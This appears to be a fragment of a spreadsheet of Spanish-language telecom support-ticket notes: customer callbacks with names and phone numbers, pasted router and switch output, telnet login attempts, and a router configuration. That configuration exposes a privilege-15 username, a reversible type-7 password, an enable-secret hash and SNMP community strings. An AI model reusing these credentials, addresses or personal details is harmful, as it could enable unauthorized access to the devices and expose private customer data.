    <t>**SE LLAMA A CLIENTE LUIS LEMUS AL 59673833 NO RESPONDE ENVIA A BUZON || SE INTENTARA LUEGO **
ID 1001689659
**</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE LUIS LEMUS AL 59673833 CONTESTA EL SEÑOR JUAN JOSE E INDICA QUE SIGUEN CON EL MISMO INCONVENIENTE || SE NOTIFICA A GESTOR   **
ID 1001700754
**</t>
  </si>
  <si>
    <t>F4574674</t>
  </si>
  <si>
    <t>EN LINEA CON CLIENTE HENRY QUINTANILLA, SE LE SOLICITA SU APOYO PARA UBICAR EQUIPO DE CLARO, DEJA EN ESPERA EN LO QUE UBICA EL EQUIPO.</t>
  </si>
  <si>
    <t>CLIENTE CONECTA ASMI52 AL TOMACORRIENTE Y YA SE OBSERVA EL E1 ACTIVO, REALIZA LLAMADAS DE PRUEBA Y VALIDA EL E1 LEVANTADO. AUTORIZA EL CIERRE DEL CASO. ID DE LLAMADA: 1001690686
&lt;NTSTP:SNT=VET-308;
SWITCHING NETWORK TERMINAL STATE
SNT                STATE       BLS   LST              FCODE
VET-308            WO
END
&lt;NTCOP:SNT=VET-308;
SWITCHING NETWORK TERMINAL CONNECTION DATA
SNT           SNTV  DEV                       EXTP               MG
VET-308           1 LIPRVGS-11168&amp;&amp;-11199     SR1/17/1/57        SMIMG01
              DIP
              0308PRG
END
&lt;STDEP:DEV=LIPRVGS-11168&amp;&amp;-11199;
DEVICE STATE DETAILS
DEV             STATE BLS  FTYPE  ADM  ABS   SNB           SNBST  LIST
LIPRVGS-11168   BLOC  MBL         NC   H'0
LIPRVGS-11169   IDLE                   H'0   26450600      IDLE   YES
LIPRVGS-11170   IDLE                   H'0   26450600      IDLE   YES
LIPRVGS-11171   IDLE                   H'0   26450600      IDLE   YES
LIPRVGS-11172   IDLE                   H'0   26450600      IDLE   YES
LIPRVGS-11173   IDLE                   H'0   26450600      IDLE   YES
LIPRVGS-11174   IDLE                   H'0   26450600      IDLE   YES
LIPRVGS-11175   IDLE                   H'0   26450600      IDLE   YES
LIPRVGS-11176   IDLE                   H'0   26450600      IDLE   YES
LIPRVGS-11177   IDLE                   H'0   26450600      IDLE   YES
LIPRVGS-11178   IDLE                   H'0   26450600      IDLE   YES
LIPRVGS-11179   IDLE                   H'0   26450600      IDLE   YES
LIPRVGS-11180   IDLE                   H'0   26450600      IDLE   YES
LIPRVGS-11181   IDLE                   H'0   26450600      IDLE   YES
LIPRVGS-11182   IDLE                   H'0   26450600      IDLE   YES
LIPRVGS-11183   IDLE                   H'0   26450600      IDLE   YES
LIPRVGS-11184   BLOC  MBL         NC   H'80
LIPRVGS-11185   IDLE                   H'0   26450600      IDLE   YES
LIPRVGS-11186   IDLE                   H'0   26450600      IDLE   YES
LIPRVGS-11187   IDLE                   H'0   26450600      IDLE   YES
LIPRVGS-11188   IDLE                   H'0   26450600      IDLE   YES
LIPRVGS-11189   IDLE                   H'0   26450600      IDLE   YES
LIPRVGS-11190   IDLE                   H'0   26450600      IDLE   YES
LIPRVGS-11191   IDLE                   H'0   26450600      IDLE   YES
LIPRVGS-11192   IDLE                   H'0   26450600      IDLE   YES
LIPRVGS-11193   IDLE                   H'0   26450600      IDLE   YES
LIPRVGS-11194   IDLE                   H'0   26450600      IDLE   YES
LIPRVGS-11195   IDLE                   H'0   26450600      IDLE   YES
LIPRVGS-11196   IDLE                   H'0   26450600      IDLE   YES
LIPRVGS-11197   IDLE                   H'0   26450600      IDLE   YES
LIPRVGS-11198   IDLE                   H'0   26450600      IDLE   YES
LIPRVGS-11199   IDLE                   H'0   26450600      IDLE   YES
END
&lt;</t>
  </si>
  <si>
    <t>F4574678</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE VICTOR CHOJOLAN 59662021 NO RESPONDE, SE INTENTARA LUEGO
-ID 1001771338</t>
  </si>
  <si>
    <t>F4574687</t>
  </si>
  <si>
    <t>SR. JIMMY LEMUS 53869969  SE RETIRA LIMITANTE EN CPE UNICAMENTE PARA RELIZAR PRUEBAS HOY, CLIENTE REALIZARA PRUEBAS, SE LLAMARA EN LAS 4PM A CLIETNE PARA CONSULTAR RESULTADO DE SUS PRUEBAS....</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE JIMMY LEMUS 53869969 MENCIONA QUE LUEGO DE LAS PRUEBAS YA TODO ESTA FUNCIONANDO CORRECTAMENTE
-ID 1001739709</t>
  </si>
  <si>
    <t>F4574696</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE DR. MIGUEL ANGEL FLORES AL 27900031 NO RESPONDE, SE INTENTARA LUEGO **
ID 1001965343
**</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE MIGUEL ANGEL FLORES 27900031 NO RESPONDE, SE INTENTARA LUEGO
-ID 1001723178</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE DR. MIGUEL ANGEL FLORES AL 27900031 NO RESPONDE, SE INTENTARA LUEGO **
ID 1001891554
**</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE  MIGUEL ANGEL FLORES 27900031 SIGUE SIN RESPONDER
-ID 1001746745</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE DR. MIGUEL ANGEL FLORES 27900031  PERO NO RESPONDE, SE INTENTARA LUEGO
-ID 1001712753 - 1001713103</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE MIGUEL ANGEL FLORES 27900031 NO RESPONDE, SE INTENTARA LUEGO **
ID 1001734557
**</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE DR. MIGUEL ANGEL FLORES AL 27900031 NO RESPONDE, SE INTENTARA LUEGO **
ID 1001907578
**</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE DR. MIGUEL ANGEL FLORES AL 27900031 NO RESPONDE, SE INTENTARA LUEGO **
ID 1001926515
**</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE RICARDO DE PAZ 22503792 CONFIRMA SERVICIO ESTABLE Y OPERATIVO **
ID 1001965798
**</t>
  </si>
  <si>
    <t>F4574719</t>
  </si>
  <si>
    <t>SE TIENE EN LINEA AL CLIENTE KATERIN HERANDEZ, QUIEN VA A UBICAR LOS EQUIPOS.
1001709066
COLA:
NOMBRE: A: 31095700
NÚMERO: 011 50231095700
DURACIÓN: 0:00:50
ESTADO: CONECTADA
DETALLES: +50231095700
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: JOSE.SOTO
FECHA Y HORA LOCALES: 23/05/2022 14:45:00</t>
  </si>
  <si>
    <t>SE LLAMO AL CLIENTE AMILCAR RIVERA PARA VER SI RECIBIO EL CORREO PERO NO CONTESTA.
1001732260, 1001732794.
COLA:
NOMBRE: A: 56956068
NÚMERO: 56956068
DURACIÓN: 0:00:30
ESTADO: DESCONECTADO [DESCONEXIÓN LOCAL]
DETALLES: 56956068
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: JOSE.SOTO
FECHA Y HORA LOCALES: 23/05/2022 15:49:26</t>
  </si>
  <si>
    <t>F4574720</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE, RESPONDE ENRIQUE ESPERANZA, QUIEN INDICA QUE HAY ENERGIA EN EL AREA,  Y LUEGO DE APLICAR RESET A LA INTERFAZ EN SWITCH DE ACCESO POR CONSULTORI, LA INTERFAZA CONTINUA DOWN, POR LO QUE SE COORDINARA VISITA PARA REVISAR EQUIPOS RADWIN
NÚMERO: 0050378601531
FIN: HOY, 15:01
ID DE LLAMADA: 1001714559</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE JOSE PEREZ 78471779 MENCIONA QUE ESTA DE ACUERDO PARA LA VISITA EL DIA DE MAÑANA EN LA MAÑANA
-ID 1001725872</t>
  </si>
  <si>
    <t>F4574724</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE ANTONIO BARRIOS AL 56049251 CLIENTE INFORMA QUE SI PUEDE ESPERAR AL TECNICO QUE EN EL LUGAR SE RETIRAN A LAS 20:00 HRS**
ID 1001735453
**</t>
  </si>
  <si>
    <t>F4574727</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE JONATHAN 79938442 MENCIONA QUE EL INCONVENIENTE ES CON EL ANCHO DE BANDA, POR LO QUE SOLICITA LLAMADA PARA MAÑANA A LAS 8:00 HRS PARA REALIZAR LAS PRUEBAS
-ID 1001743399</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE JONATHAN 79938442 NO RESPONDE, SE INTENTARA LUEGO
-ID 1001807259</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE JONATHAN REYES 79938442 CLIENTE CONFIRMA SERVICIO ESTABLE Y OPERATIVO **
AUTORIZA CIERRE DEL TICKET **
ID 1001867210
**</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE JONATHAN REYES AL 70692118 CL NO RESPONDE, ENVIA A BUZON SE INTENTARA LUEGO **
ID 1001738212
**</t>
  </si>
  <si>
    <t>F4574732</t>
  </si>
  <si>
    <t>SE CONVERSA CON CLIENTE ALAN GONZALEZ, SOLICITA QUE SE CONTACTE AL EJECUTIVO DE PARTE DE CLARO Y SE EL PONGA AL TANTO DE LA SITUACION YA QUE NO PUEDE ESPERAR MUCHO TIEMPO PARA QUE SE DESENLISTE LA IP DE MANERA AUTOMATICA.
1001957519
COLA:
NOMBRE: A: 37627776
NÚMERO: 011 50237627776
DURACIÓN: 0:03:27
ESTADO: DESCONECTADO [DESCONEXIÓN REMOTA]
DETALLES: +50237627776
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: LUVY.SANDOVAL
FECHA Y HORA LOCALES: 24/05/2022 15:08:12</t>
  </si>
  <si>
    <t>F4574737</t>
  </si>
  <si>
    <t>SE ESCALÓ CON WILSON ECHEVERRÍA/TÉCNICO 58266336 INDICA QUE ESTÁ CERCA DE PR; PIDE SE CONFIRME CON CLIENTE SI YA SU TÉCNICO PBX ESTÁ EN SUS INSTALACIONES; SE LLAMÓ HABLÓ CON DIEGO MONTERROSO/CLIENTE 59797175 CONFIRMA QUE TÉCNICO PBX YA ESTÁ EN SITIO, SE INFORMA DE LO ANTERIOR A TÉCNICO CLARO ASIGNADO.</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE DIEGO MONTERROSO AL 59797175 CLIENTE INDICA QUE EL DIA DE AYER SE ESTUVIERON REALIZANDO PRUEBAS Y MODIFICACIONES PERO AUN NO LEVANTA **
ID 1001803546
**</t>
  </si>
  <si>
    <t>SE RECIBE LLAMADA DE PARTE DE CC GT CON EL CLIENTE DIEGO QUIEN COMENTA QUE YA REALIZARON PRUEBAS EN EL SERVICIO Y QUE POR PARTE DEL PROVEEDOR NO ENCONTRARON NINGUN INCONVENIENTE, SOLICITA QUE SE PUEDAN REALIZAR PRUEBAS EN CONJUNTO CON TECNICOS DE CLARO, SE LE INDICA QUE SE ESTARA VALIDANDO QUIEN SE ENCUENTRA DISPONIBLE PARA APOYARNOS CON RELAIZAR PRUEBAS, CLIENTE QUEDA ENTERADO E INDICA QUE SI SE DEMORAN MAS DE 1 HR QUE MEJOR SE LE AVISE
##LLAMADA DESDE VIVO</t>
  </si>
  <si>
    <t>SE LLAMO AL CLIENTE DIEGO MONTERROSO. QUIEN VA A UBICAR LOS EQUIPOS.
1001729645
COLA:
NOMBRE: A: 59797175
NÚMERO: 59797175
DURACIÓN: 0:00:29
ESTADO: CONECTADA
DETALLES: 59797175
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: JOSE.SOTO
FECHA Y HORA LOCALES: 23/05/2022 15:41:56</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE DIEGO MONTERROSO AL 59797175 CONFIRMA SERVICIO ESTABLE Y OPERATIVO **
ID 1'01939184
**</t>
  </si>
  <si>
    <t>F4574742</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE GUADALUPE QUIJADA 79878779 MENCIONA QUE ESTARAN REALIZANDO PRUEBAS POR LO QUE SOLICITA LLAMADA PARA LAS 9:30  HRS
-ID 1001758055</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE GUADALUPE QUIJADA 79878779 QUIEN COMENTA QUE EL E1 YA ESTÁ FUNCIONANDO, INDICA QUE SE QUEDARON SIN SERVICIO POR ALGUNOS MINUTOS, SOLICITA SE VALIDE A LAS 17 HORAS. ID1001716746</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE GUADALUPE QUIJADA 79878779 PERO NO RESPONDE, SE INTENTARA LUEGO
-ID 1001830539 - 1001830938</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE GUADALUPE QUIJADA AL 79878779 CONFIRMA SERVICIO ESTABLE Y OPERATIVO **
-ID 1001865979
**</t>
  </si>
  <si>
    <t>F4574750</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE LUIS LEMUS 21211912 MENCIONA QUE SIGUE OBSERVANDO EL SERVICIO CAIDO, SE NOTIFICARA PARA EL SEGUIMIENTO
-ID 1001752329</t>
  </si>
  <si>
    <t>F4574760</t>
  </si>
  <si>
    <t>CLEINTE YANIRA BRAVO-42836260  VALIDA SERVICIO ##VIVO</t>
  </si>
  <si>
    <t>F4574762</t>
  </si>
  <si>
    <t>SE REENVIA COREO A CLIENTE
DE: ODALIS ANAHI CARDENAS SALAZAR &lt;ODALIS.CARDENAS@CLARO.COM.GT&gt;
ENVIADO: LUNES, 23 DE MAYO DE 2022 17:00
PARA: LUIS MIGUEL IXCOT MORALES &lt;LUIS.IXCOT@CLARO.COM.GT&gt;; CARMEN.BERDUGO@CLARO.COM.SV &lt;CARMEN.BERDUGO@CLARO.COM.SV&gt;
CC: GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;; CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;
ASUNTO: RE: LENTITUD ID1041089 || DISEÑO DE ESPUMA SALVADOREÑO S.A. DE C.V.
*-*-*-*-*</t>
  </si>
  <si>
    <t>F4574763</t>
  </si>
  <si>
    <t>EN GESTION CON TECNICO, HACEN CONEXION A OTRO PUERTO ETH DEL CISCO YA QUE APARENTEMENTE SE DAÑO,
IP2350001#SHO INTER DES
INTERFACE                      STATUS         PROTOCOL DESCRIPTION
AT0                            UP             UP
AT0.1                          UP             UP       CAJA DE CREDITO DE ZACATECOLUCA (HOTEL IZALCO CABAQA CLUB)
ET0                            ADMIN DOWN     DOWN
FA0                            DOWN           DOWN
FA1                            UP             UP
FA2                            DOWN           DOWN
FA3                            DOWN           DOWN
GI0                            DOWN           DOWN
GI1                            ADMIN DOWN     DOWN
LO5                            UP             UP       MONITOREO DEL CNOC
VL1                            DOWN           DOWN     RED LAN
IP2350001#SHO IP INT BRIE
INTERFACE                  IP-ADDRESS      OK? METHOD STATUS                PROTOCOL
ATM0                       UNASSIGNED      YES NVRAM  UP                    UP
ATM0.1                     10.154.75.34    YES NVRAM  UP                    UP
ETHERNET0                  UNASSIGNED      YES NVRAM  ADMINISTRATIVELY DOWN DOWN
FASTETHERNET0              UNASSIGNED      YES UNSET  DOWN                  DOWN
FASTETHERNET1              UNASSIGNED      YES UNSET  UP                    UP
FASTETHERNET2              UNASSIGNED      YES UNSET  DOWN                  DOWN
FASTETHERNET3              UNASSIGNED      YES UNSET  DOWN                  DOWN
GIGABITETHERNET0           UNASSIGNED      YES UNSET  DOWN                  DOWN
GIGABITETHERNET1           UNASSIGNED      YES NVRAM  ADMINISTRATIVELY DOWN DOWN
LOOPBACK5                  10.166.20.38    YES NVRAM  UP                    UP
VLAN1                      172.19.1.53     YES NVRAM  UP                    UP
IP2350001#SHO ARP
PROTOCOL  ADDRESS          AGE (MIN)  HARDWARE ADDR   TYPE   INTERFACE
INTERNET  10.154.75.33           19   F41D.6BB1.E0E7  ARPA   ATM0.1
INTERNET  172.19.1.53             -   2894.0F77.63D0  ARPA   VLAN1
INTERNET  172.19.1.54             0   0007.326C.6629  ARPA   VLAN1
INTERNET  172.19.4.217            -   2894.0F77.63D0  ARPA   VLAN1
INTERNET  172.19.4.218            0   0003.2247.B9A4  ARPA   VLAN1
IP2350001#SHO ARP
PROTOCOL  ADDRESS          AGE (MIN)  HARDWARE ADDR   TYPE   INTERFACE
INTERNET  10.154.75.33            1   F41D.6BB1.E0E7  ARPA   ATM0.1
INTERNET  172.19.1.53             -   2894.0F77.63D0  ARPA   VLAN1
INTERNET  172.19.1.54             0   0007.326C.6629  ARPA   VLAN1
INTERNET  172.19.4.217            -   2894.0F77.63D0  ARPA   VLAN1
INTERNET  172.19.4.218            1   0003.2247.B9A4  ARPA   VLAN1
IP2350001#</t>
  </si>
  <si>
    <t>SEGUN CLIENTE LAS REDES AL ENLACE QUE REPORTA SE ENCUENTRAN EN OTRO ID DE SERVICIO, SERA MEJOR HACER VISITA EN CONJUNTO NUEVAMENTE CON CLIENTE PARA VALIDAR ENLACE, SE LLAMARA NUEVAMENTE A KELVIN PARA ACORDAR NUEVA VISITA EN SIMULTANEO YA QUE HOY SOLO PERSONAL CLARO SE PRESENTO</t>
  </si>
  <si>
    <t>KELVIN MARTINEZ INDICA QUE KLAS REDES INDICADAS NO SON LAS CORRECTAS, EN CRONOLOGIAS ANTERIORES SE VE REFLEJADO LOS MISMO SEGMENTOS</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE 22407528 MENCIONA QUE EL SERVICIO SIGUE CAIDO POR LO QUE SOLICITA SE PUEDA VOLVER A VALIDAR
-ID 1001815116</t>
  </si>
  <si>
    <t>SE CORDINA CON CLIENTE VISITA PARA LAS 13:30 HORAS PARA ACCESO A CAJERO YA  QUE INTERFACE LAN SE VE DOWN</t>
  </si>
  <si>
    <t>EN GESTION CON TECNICO SE VE CONEXION EN RED LAN SE VEN REFLEJADAS MACC ADRES DE DISPOSITIVO CLIENTE
IP2085017#    PING 172.19.1.118 REPEAT 1500
TYPE ESCAPE SEQUENCE TO ABORT.
SENDING 1500, 100-BYTE ICMP ECHOS TO 172.19.1.118, TIMEOUT IS 2 SECONDS:
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
SUCCESS RATE IS 100 PERCENT (1500/1500), ROUND-TRIP MIN/AVG/MAX = 1/1/24 MS
IP2085017#
INFO: THE CONNECTION WAS CLOSED BY THE REMOTE HOST.
&lt;PZACSVYQN1D1EID1&gt;
INFO: THE MAX NUMBER OF VTY USERS IS 15, AND THE NUMBER OF CURRENT VTY USERS ON LINE IS 1.
PLEASE ENTER LOGIN INFORMATION FOR 10.179.30.8.
USERNAME: JAFERNANDEZ
+----------------------------------------------------------------+
| ESTE EQUIPO ES PROPIEDAD PRIVADA,                              |
| SI NO TIENE AUTORIZACION PARA INGRESAR AL EQUIPO, POR FAVOR    |
| CANCELE LA CONEXION INMEDIATAMENTE,CUALQUIER ANOMALIA SERA     |
| REPORTADA A LAS AUTORIDADES CORRESPONDIENTES.                  |
+----------------------------------------------------------------+
PASSWORD:
PASSWORD AUTHENTICATION FAILED.
PLEASE VERIFY THAT THE USERNAME AND PASSWORD ARE CORRECT.
PASSWORD:
WARNING: NEGOTIATED KEY EXCHANGE ALGORITHM AND IDENTITY KEY FOR SERVER AUTHENTICATION ARE NOT SAFE. IT IS RECOMMENDED THAT YOU DISABLE THE INSECURE ALGORITHM OR UPGRADE THE CLIENT.
INFO: THE MAX NUMBER OF VTY USERS IS 15, THE NUMBER OF CURRENT VTY USERS ONLINE IS 1, AND TOTAL NUMBER OF TERMINAL USERS ONLINE IS 1.
      THE CURRENT LOGIN TIME IS 2022-05-24 08:59:36-06:00.
INFO: THE DEVICE IS NOT ENABLED WITH SECURE BOOT, PLEASE ENABLE IT.
&lt;PZACSVYQN1D1EID1&gt;TELNET VPN-INSTANCE CAJADECREDITO 10.154.77.59
TRYING 10.154.77.59 ...
PRESS CTRL+K TO ABORT
CONNECTED TO 10.154.77.59 ...
*********************************************************
*       ACCESO RESTRINGIDO / RESTRICTED ACCESS          *
* SOLO PERSONAL AUTORIZADO / AUTHORIZED PERSONNEL ONLY  *
* TODOS LOS ACCESOS SON MONITOREADOS / MONITORED ACCESS *
*********************************************************
USER ACCESS VERIFICATION
USERNAME: GESTIONIP
PASSWORD:
% AUTHENTICATION FAILED
USERNAME:
USERNAME: GESTIONIP
PASSWORD:
% AUTHENTICATION FAILED
INFO: THE CONNECTION WAS CLOSED BY THE REMOTE HOST.
&lt;PZACSVYQN1D1EID1&gt;
&lt;PZACSVYQN1D1EID1&gt;TELNET VPN-INSTANCE CAJADECREDITO 10.154.77.59
TRYING 10.154.77.59 ...
PRESS CTRL+K TO ABORT
CONNECTED TO 10.154.77.59 ...
*********************************************************
*       ACCESO RESTRINGIDO / RESTRICTED ACCESS          *
* SOLO PERSONAL AUTORIZADO / AUTHORIZED PERSONNEL ONLY  *
* TODOS LOS ACCESOS SON MONITOREADOS / MONITORED ACCESS *
*********************************************************
USER ACCESS VERIFICATION
USERNAME: GESTIONIP
PASSWORD:
% AUTHENTICATION FAILED
USERNAME:
USERNAME: GESTIONIP
PASSWORD:
% AUTHENTICATION FAILED
INFO: THE CONNECTION WAS CLOSED BY THE REMOTE HOST.
&lt;PZACSVYQN1D1EID1&gt;TELNET VPN-INSTANCE CAJADECREDITO 10.154.77.59
TRYING 10.154.77.59 ...
PRESS CTRL+K TO ABORT
CONNECTED TO 10.154.77.59 ...
*********************************************************
*       ACCESO RESTRINGIDO / RESTRICTED ACCESS          *
* SOLO PERSONAL AUTORIZADO / AUTHORIZED PERSONNEL ONLY  *
* TODOS LOS ACCESOS SON MONITOREADOS / MONITORED ACCESS *
*********************************************************
USER ACCESS VERIFICATION
USERNAME: GESTIONIP
PASSWORD:
% AUTHENTICATION FAILED
USERNAME: T3LN0CR3D3S
PASSWORD:
IP2085017#SHO ARP
PROTOCOL  ADDRESS          AGE (MIN)  HARDWARE ADDR   TYPE   INTERFACE
INTERNET  10.154.77.57            0   A4BE.2BE5.AD0F  ARPA   ATM0.1
INTERNET  172.19.1.117            -   501C.BFDA.5DC0  ARPA   VLAN1
INTERNET  172.19.1.118            0   0007.326C.68C1  ARPA   VLAN1
INTERNET  172.19.4.213            -   501C.BFDA.5DC0  ARPA   VLAN1
INTERNET  172.19.4.214            0   0003.2247.B952  ARPA   VLAN1
IP2085017#</t>
  </si>
  <si>
    <t>SE UBICA ENLACE EN OTRO PE DIAGNOSTICO NO FUE CORRECTO
USERNAME: T3LN0CR3D3S
PASSWORD:
IP2350001#SHO IP INT BRIE
INTERFACE                  IP-ADDRESS      OK? METHOD STATUS                PROTOCOL
ATM0                       UNASSIGNED      YES NVRAM  UP                    UP
ATM0.1                     10.154.75.34    YES NVRAM  UP                    UP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UNASSIGNED      YES NVRAM  ADMINISTRATIVELY DOWN DOWN
LOOPBACK5                  10.166.20.38    YES NVRAM  UP                    UP
VLAN1                      172.19.1.53     YES NVRAM  DOWN                  DOWN
IP2350001#SHO ARP
PROTOCOL  ADDRESS          AGE (MIN)  HARDWARE ADDR   TYPE   INTERFACE
INTERNET  10.154.75.33           10   F41D.6BB1.E0E7  ARPA   ATM0.1
INTERNET  172.19.1.53             -   2894.0F77.63D0  ARPA   VLAN1
INTERNET  172.19.4.217            -   2894.0F77.63D0  ARPA   VLAN1
IP2350001#SHO IP INT BRIE
INTERFACE                  IP-ADDRESS      OK? METHOD STATUS                PROTOCOL
ATM0                       UNASSIGNED      YES NVRAM  UP                    UP
ATM0.1                     10.154.75.34    YES NVRAM  UP                    UP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UNASSIGNED      YES NVRAM  ADMINISTRATIVELY DOWN DOWN
LOOPBACK5                  10.166.20.38    YES NVRAM  UP                    UP
VLAN1                      172.19.1.53     YES NVRAM  DOWN                  DOWN
IP2350001#SHO RUN
BUILDING CONFIGURATION...
CURRENT CONFIGURATION : 3482 BYTES
!
VERSION 15.1
SERVICE NAGLE
NO SERVICE PAD
SERVICE TCP-KEEPALIVES-IN
SERVICE TCP-KEEPALIVES-OUT
SERVICE TIMESTAMPS DEBUG DATETIME MSEC LOCALTIME SHOW-TIMEZONE
SERVICE TIMESTAMPS LOG DATETIME MSEC LOCALTIME SHOW-TIMEZONE
SERVICE PASSWORD-ENCRYPTION
!
HOSTNAME IP2350001
!
BOOT-START-MARKER
BOOT-END-MARKER
!
!
LOGGING BUFFERED 4096
NO LOGGING CONSOLE
ENABLE SECRET 5 $1$JVPC$6ET7V0WCVW/CRIQ2VHMUY/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DSL
CLOCK TIMEZONE GMT -6 0
NO IPV6 CEF
NO IP SOURCE-ROUTE
NO IP GRATUITOUS-ARPS
IP CEF
!
!
!
!
!
NO IP BOOTP SERVER
IP DOMAIN NAME TELECOM.COM.SV
!
!
!
CRYPTO PKI TOKEN DEFAULT REMOVAL TIMEOUT 0
!
!
!
!
USERNAME T3LN0CR3D3S PRIVILEGE 15 PASSWORD 7 120D561B1C5B0F567A7B7C
!
!
CONTROLLER VDSL 0
!
IP TCP SYNWAIT-TIME 10
!
!
!
!
!
BRIDGE IRB
!
!
!
!
INTERFACE LOOPBACK5
 DESCRIPTION MONITOREO DEL CNOC
 IP ADDRESS 10.166.20.38 255.255.255.255
!
INTERFACE ATM0
 NO IP ADDRESS
 NO ATM ILMI-KEEPALIVE
!
INTERFACE ATM0.1 POINT-TO-POINT
 DESCRIPTION CAJA DE CREDITO DE ZACATECOLUCA (HOTEL IZALCO CABAQA CLUB)
 BANDWIDTH 128
 IP ADDRESS 10.154.75.34 255.255.255.248
 IP RIP ADVERTISE 45
 IP VIRTUAL-REASSEMBLY IN
 ATM ROUTE-BRIDGED IP
 BRIDGE-GROUP 1
 PVC 0/46
  ENCAPSULATION AAL5SNAP
 !
!
INTERFACE ETHERNET0
 NO IP ADDRESS
 SHUTDOWN
!
INTERFACE FASTETHERNET0
 NO IP ADDRESS
!
INTERFACE FASTETHERNET1
 NO IP ADDRESS
!
INTERFACE FASTETHERNET2
 NO IP ADDRESS
!
INTERFACE FASTETHERNET3
 NO IP ADDRESS
!
INTERFACE GIGABITETHERNET0
 NO IP ADDRESS
!
INTERFACE GIGABITETHERNET1
 NO IP ADDRESS
 SHUTDOWN
 DUPLEX AUTO
 SPEED AUTO
!
INTERFACE VLAN1
 DESCRIPTION RED LAN
 IP ADDRESS 172.19.4.217 255.255.255.252 SECONDARY
 IP ADDRESS 172.19.1.53 255.255.255.252
!
IP FORWARD-PROTOCOL ND
NO IP HTTP SERVER
NO IP HTTP SECURE-SERVER
!
!
IP ROUTE 0.0.0.0 0.0.0.0 10.154.75.33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
!
SNMP-SERVER COMMUNITY ESCW2KPU RO 97
SNMP-SERVER COMMUNITY NM15SNMPRO RO 88
SNMP-SERVER TRAP-SOURCE LOOPBACK5
!
!
BRIDGE 1 PROTOCOL IEEE
